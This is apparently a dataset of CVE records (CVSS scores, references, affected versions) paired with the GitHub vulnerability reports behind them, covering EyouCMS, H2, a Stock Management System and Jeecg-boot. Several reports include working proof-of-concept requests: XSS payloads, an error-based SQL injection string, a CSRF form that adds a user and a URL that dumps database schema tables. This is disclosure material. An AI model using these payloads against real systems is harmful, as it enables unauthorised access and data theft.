[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/32" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "EB987CAE-6D4D-417A-8E0D-9DCC47F986EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/32
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
name:EyouCMS version: EyouCMS-V1.6.0-UTF8-SP1 Installation package [download:](https://www.eyoucms.com/rizhi/2022/1102/28642.html) ![image](https://user-images.githubusercontent.com/75592724/201087069-82587b7d-1043-4568-a3f8-72bc315b581d.png) Problematic packets: > POST /login.php?m=admin&c=Links&a=add&_ajax=1&lang=cn HTTP/1.1 > Host: 192.168.23.130:49160 > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 > Accept: application/json, text/javascript, */*; q=0.01 > Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 > Accept-Encoding: gzip, deflate > Content-Type: application/x-www-form-urlencoded; charset=UTF-8 > X-Requested-With: XMLHttpRequest > Content-Length: 141 > Origin: http://192.168.23.130:49160 > Connection: close > Referer: http://192.168.23.130:49160/login.php?m=admin&c=Links&a=add&lang=cn > Cookie: PHPSESSID=07lpb0tri05c4fqvd85em8u6rs; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A%221%22%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=seo%7CSeo; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D5%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; admin-arctreeClicked-Arr=%5B%5D; admin-treeClicked-Arr=%5B%5D; referurl=http%3A%2F%2F192.168.23.130%3A49160%2F; img_id_upload=; ENV_IS_UPHTML=0; imgname_id_upload= > > typeid=1&groupid=1&url=javascript%3Aalert(123)&title=XS&logo_local=&logo_remote=&province_id=0&city_id=&area_id=&sort_order=100&email=&intro= Vulnerability recurrence 1.Log in to the background,Click "SEO module" ->"friendship link" ->"add link" ![image](https://user-images.githubusercontent.com/75592724/201087868-9e277a70-d1c7-4279-9ef0-cb3907fa28fd.png) 2.input payload:javascript:alert(11),Submit ![image](https://user-images.githubusercontent.com/75592724/201088874-80075e5d-b129-4f83-b024-10b400d11ad8.png) Click and trigger XSS after submission ![image](https://user-images.githubusercontent.com/75592724/201088329-58f0e3d5-de78-4d2e-ada9-9764568c213c.png) ![image](https://user-images.githubusercontent.com/75592724/201088593-49114a42-0c28-47bc-ab5b-40eb0896515d.png) PS:The vulnerability will also be displayed on the home page and can be triggered by clicking ![image](https://user-images.githubusercontent.com/75592724/201089236-82584e4f-ad5f-43b8-90f4-4157984f78b4.png) ![image](https://user-images.githubusercontent.com/75592724/201089301-e1d3b09e-4b69-4e92-b27c-22918f04a68e.png)
EyouCMS v1.6.0 existence stored cross-site scripting (XSS)
https://api.github.com/repos/weng-xianhu/eyoucms/issues/32/comments
1
2022-11-10T12:16:56Z
2023-02-21T01:34:50Z
https://github.com/weng-xianhu/eyoucms/issues/32
1,443,805,273
32
4,424
CVE-2022-45868
2022-11-23T21:15:11.360
The web-based admin console in H2 Database Engine before 2.2.220 can be started via the CLI with the argument -webAdminPassword, which allows the user to specify the password in cleartext for the web admin console. Consequently, a local user (or an attacker that has obtained local access through some means) would be able to discover the password by listing processes and their arguments. NOTE: the vendor states "This is not a vulnerability of H2 Console ... Passwords should never be passed on the command line and every qualified DBA or system administrator is expected to know that." Nonetheless, the issue was fixed in 2.2.220.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.5, "impactScore": 5.9, "source": "cve@mitre.org", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/advisories/GHSA-22wj-vf5f-wrvj" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/h2database/h2database/blob/96832bf5a97cdc0adc1f2066ed61c54990d66ab5/h2/src/main/org/h2/server/web/WebServer.java#L346-L347" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/h2database/h2database/issues/3686" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/h2database/h2database/pull/3833" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/h2database/h2database/releases/tag/version-2.2.220" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://sites.google.com/sonatype.com/vulnerabilities/sonatype-2022-6243" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/advisories/GHSA-22wj-vf5f-wrvj" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/h2database/h2database/blob/96832bf5a97cdc0adc1f2066ed61c54990d66ab5/h2/src/main/org/h2/server/web/WebServer.java#L346-L347" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/h2database/h2database/issues/3686" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/h2database/h2database/pull/3833" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/h2database/h2database/releases/tag/version-2.2.220" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://sites.google.com/sonatype.com/vulnerabilities/sonatype-2022-6243" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:h2database:h2:*:*:*:*:*:*:*:*", "matchCriteriaId": "EFEFD20F-4B01-42B0-BD3A-F8FCA9AE9DD5", "versionEndExcluding": null, "versionEndIncluding": "2.1.214", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "312" ]
312
https://github.com/h2database/h2database/issues/3686
null
github.com
[ "h2database", "h2database" ]
Dependabot and `org.owasp:dependency-check-maven` have been reporting CVE-2022-45868 (see https://github.com/advisories/GHSA-22wj-vf5f-wrvj) to me. I didn't find this CVE referenced from any issue in the issue tracker here, so I'm creating this one. Since the CVE has already been published (possibly as a zero day??), I suspect it's OK to report this publicly here. For future private reports, I think it would be useful to set up a security policy here on github? https://github.com/h2database/h2database/security/policy
CVE-2022-45868: Password exposure in H2 Database (not an issue)
https://api.github.com/repos/h2database/h2database/issues/3686/comments
13
2022-12-01T14:27:16Z
2024-04-02T09:11:15Z
https://github.com/h2database/h2database/issues/3686
1,471,413,455
3,686
4,425
CVE-2022-4088
2022-11-24T10:15:11.103
A vulnerability was found in rickxy Stock Management System and classified as critical. Affected by this issue is some unknown functionality of the file /pages/processlogin.php. The manipulation of the argument user/password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-214322 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rickxy/Stock-Management-System/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214322" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rickxy/Stock-Management-System/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214322" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stock_management_system_project:stock_management_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "A57E1F1C-75BF-46D8-987E-98223ED68D41", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/rickxy/Stock-Management-System/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rickxy", "Stock-Management-System" ]
Build environment: Apache 2.4.39; MySQL5.7.26; PHP7.3.4 ## SQL injection vulnerability in Stock Management System ``` In processlogin PHP, in lines 7 to 9 of the code, the back-end receives the user and password parameters passed through by the front-end, and encrypts the password with sha1; In lines 18 to 25 of the code, the user and password are substituted into the database for query verification. During this process, SQL injection vulnerabilities are created without filtering ``` ### SQL injection proof * SQLMAP ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1121sql.png) * BuspSuite ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1121bpsql.png) POC: ``` POST /pages/processlogin.php HTTP/1.1 Host: vulscms.test Content-Length: 80 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://vulscms.test Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://vulscms.test/pages/login.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=roq9qu2s58ta48gg165qqke6l9 Connection: close user=1' AND GTID_SUBSET(CONCAT((SELECT USER())),5439)-- ace&password=1&btnlogin= ```
SQL injection vulnerability in Stock Management System
https://api.github.com/repos/rickxy/Stock-Management-System/issues/2/comments
0
2022-11-21T11:48:39Z
2022-11-24T12:40:57Z
https://github.com/rickxy/Stock-Management-System/issues/2
1,457,808,295
2
4,426
CVE-2022-4089
2022-11-24T10:15:11.197
A vulnerability was found in rickxy Stock Management System. It has been declared as problematic. This vulnerability affects unknown code of the file /pages/processlogin.php. The manipulation of the argument user leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214324.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rickxy/Stock-Management-System/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214324" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rickxy/Stock-Management-System/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214324" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stock_management_system_project:stock_management_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "A57E1F1C-75BF-46D8-987E-98223ED68D41", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/rickxy/Stock-Management-System/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rickxy", "Stock-Management-System" ]
## Reflective XSS vulnerability in Stock Management System ```php+HTML In processlogin PHP, in lines 18-25 of the code, the parameters entered by the front end are brought into the database for associated table query, and then the results of database execution are returned. After the 27th line of code, judge the results of database execution, and return the output results to the front end, which is shown in the interface. Payload is 1 '<script>alert (1)</script>, that is, after the statement is closed, return it to the front end, and output it on the front end, causing XSS vulnerabilities. ``` Proof of vulnerability utilization: ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1121alert.png) POC: ``` POST /pages/processlogin.php HTTP/1.1 Host: vulscms.test Content-Length: 54 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://vulscms.test Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://vulscms.test/pages/login.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=roq9qu2s58ta48gg165qqke6l9 Connection: close user=1' <script>alert(1)</script>&password=1&btnlogin= ```
Reflective XSS vulnerability in Stock Management System
https://api.github.com/repos/rickxy/Stock-Management-System/issues/3/comments
0
2022-11-21T11:49:10Z
2022-11-24T12:40:49Z
https://github.com/rickxy/Stock-Management-System/issues/3
1,457,808,895
3
4,427
CVE-2022-4090
2022-11-24T13:15:10.467
A vulnerability was found in rickxy Stock Management System and classified as problematic. This issue affects some unknown processing of the file us_transac.php?action=add. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214331.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rickxy/Stock-Management-System/issues/4" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214331" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rickxy/Stock-Management-System/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.214331" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stock_management_system_project:stock_management_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "A57E1F1C-75BF-46D8-987E-98223ED68D41", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/rickxy/Stock-Management-System/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rickxy", "Stock-Management-System" ]
## The Stock Management System has a CSRF vulnerability ```html In use_ In add.php, add user information and send it to us via post request_ transac. Php, and then stored the new user information in the database without cookie or session verification or referer verification, resulting in a CSRF vulnerability. Similarly, there is a storage XSS vulnerability here ``` CSRF POC: ```html <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://vulscms.test/pages/us_transac.php?action=add" method="POST"> <input type="hidden" name="empid" value="1" /> <input type="hidden" name="username" value="ace" /> <input type="hidden" name="password" value="123456" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` Poc is to insert data with user name ace into the database ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/user_add.png)
The Stock Management System has a CSRF vulnerability
https://api.github.com/repos/rickxy/Stock-Management-System/issues/4/comments
0
2022-11-21T11:49:34Z
2022-11-24T12:40:33Z
https://github.com/rickxy/Stock-Management-System/issues/4
1,457,809,383
4
4,428
CVE-2022-45205
2022-11-25T17:15:11.007
Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component /sys/dict/queryTableData.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://jeecg-boot.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4128" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://jeecg-boot.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4128" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "49DF84AE-6D1A-4065-AB0B-CB6926D6C5F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/4128
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
# SysDictMapper.xml queryDictTablePageList。You can see that no precompiling is performed <img width="960" alt="截屏2022-10-25 15 24 58" src="https://user-images.githubusercontent.com/60163868/197709842-99880e4f-25e4-4f5a-a2cb-4fa8dcca4db2.png"> # SysDictController.java <img width="1192" alt="截屏2022-10-25 15 25 29" src="https://user-images.githubusercontent.com/60163868/197709957-cd39a764-b173-4958-ad07-75c31c07c594.png"> # SysDictServiceImpl.java <img width="807" alt="截屏2022-10-25 15 26 05" src="https://user-images.githubusercontent.com/60163868/197710069-7de3a1d9-616e-4e2d-a5ff-3fc3a5e8fee9.png"> # vuln There is no control over the user's control over the table, column, and database name, so that the attacker can directly obtain all data # poc http://192.168.1.1:8088/jeecg-boot/sys/dict/queryTableData?pageSize=100&table=information_schema.tables&text=table_name&code=TABLE_SCHEMA There is no control over the user's control over the table, column, and database name, so that the attacker can directly obtain all data ## MySQL background code <img width="1227" alt="截屏2022-10-25 15 28 13" src="https://user-images.githubusercontent.com/60163868/197710513-13392cf8-cf24-40f8-9866-7f52069dec06.png"> ## result in the website <img width="1889" alt="截屏2022-10-25 15 33 29" src="https://user-images.githubusercontent.com/60163868/197711567-079e07b7-c823-4b96-8d2b-ef2d5be3c52b.png"> pagesize control the result num,and code text control the column_name you want,table control the tables # patch Change to precompile Verify the fields entered by the user
[CVE-2022-45205]/sys/dict/queryTableData is affected by sql injection
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4128/comments
2
2022-10-25T07:31:16Z
2022-12-01T07:35:33Z
https://github.com/jeecgboot/JeecgBoot/issues/4128
1,421,998,736
4,128
4,429
CVE-2022-45206
2022-11-25T17:15:11.060
Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component /sys/duplicate/check.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://jeecg-boot.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4129" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://jeecg-boot.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4129" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "49DF84AE-6D1A-4065-AB0B-CB6926D6C5F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/4129
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
[jeecg-boot漏洞.pdf](https://github.com/jeecgboot/jeecg-boot/files/9858362/jeecg-boot.pdf)
[CVE-2022-45206]/sys/duplicate/check存在sql注入漏洞
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/4129/comments
12
2022-10-25T08:10:59Z
2024-04-21T07:44:09Z
https://github.com/jeecgboot/JeecgBoot/issues/4129
1,422,048,340
4,129
4,430
CVE-2022-45207
2022-11-25T17:15:11.117
Jeecg-boot v3.4.3 was discovered to contain a SQL injection vulnerability via the component updateNullByEmptyString.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "http://jeecg-boot.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4127" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "http://jeecg-boot.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jeecgboot/jeecg-boot/issues/4127" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "49DF84AE-6D1A-4065-AB0B-CB6926D6C5F3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/jeecgboot/jeecg-boot/issues/4127
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jeecgboot", "jeecg-boot" ]
java提供了原生的预编译sql语句,这样可以防止sql注入问题 # queryListWithPermission 下图没有进行预编译处理,建议换成#{},虽然项目现在没有使用这条语句,但不排除以后的可能,建议修复 <img width="1532" alt="截屏2022-10-25 10 48 22" src="https://user-images.githubusercontent.com/60163868/197670494-95f85eb2-ce58-43ee-9aef-02b9e07ba2b1.png"> # updateNullByEmptyString 下图也使用的是${} <img width="1139" alt="截屏2022-10-25 10 51 52" src="https://user-images.githubusercontent.com/60163868/197670945-89f82647-b399-4a6a-b9b1-03eb2a713926.png"> 但实际上是写死的,但为了安全考虑,建议也换乘#{} <img width="780" alt="截屏2022-10-25 10 52 35" src="https://user-images.githubusercontent.com/60163868/197671024-f7cee512-178f-4af5-8c2c-f62664b0e356.png"> # selectLogicDeleted 这里也建议换乘#{} <img width="1321" alt="截屏2022-10-25 11 20 57" src="https://user-images.githubusercontent.com/60163868/197674680-6577a959-a502-412f-ad08-37297971dfd1.png"> # queryFilterTableDictInfo <img width="1566" alt="截屏2022-10-25 14 52 32" src="https://user-images.githubusercontent.com/60163868/197702885-801b65ee-7a36-4077-9764-96e9e26a6d32.png"> # queryTableDictItemsByCodeAndFilter <img width="1595" alt="截屏2022-10-25 14 53 37" src="https://user-images.githubusercontent.com/60163868/197703101-ff062b69-6b01-4663-862e-7a4acf3f6625.png"> # queryTableDictTextByKey <img width="1261" alt="截屏2022-10-25 14 54 35" src="https://user-images.githubusercontent.com/60163868/197703286-0cf1f799-35ac-4016-ba5b-1048fe40f017.png"> # queryTreeList <img width="1075" alt="截屏2022-10-25 15 13 33" src="https://user-images.githubusercontent.com/60163868/197707515-1bc6dd34-f6b7-49b7-a57d-ee7b2f14ab6a.png"> # queryTableDictWithFilter <img width="1529" alt="截屏2022-10-25 15 39 16" src="https://user-images.githubusercontent.com/60163868/197712742-0d3b7355-bbe1-42b3-862b-3e0271b29285.png"> # queryAllTableDictItems <img width="1597" alt="截屏2022-10-25 15 40 55" src="https://user-images.githubusercontent.com/60163868/197713074-c6d05bb4-303c-49c5-9dae-9b5544c03a80.png"> # queryTableDictByKeysAndFilterSql <img width="1429" 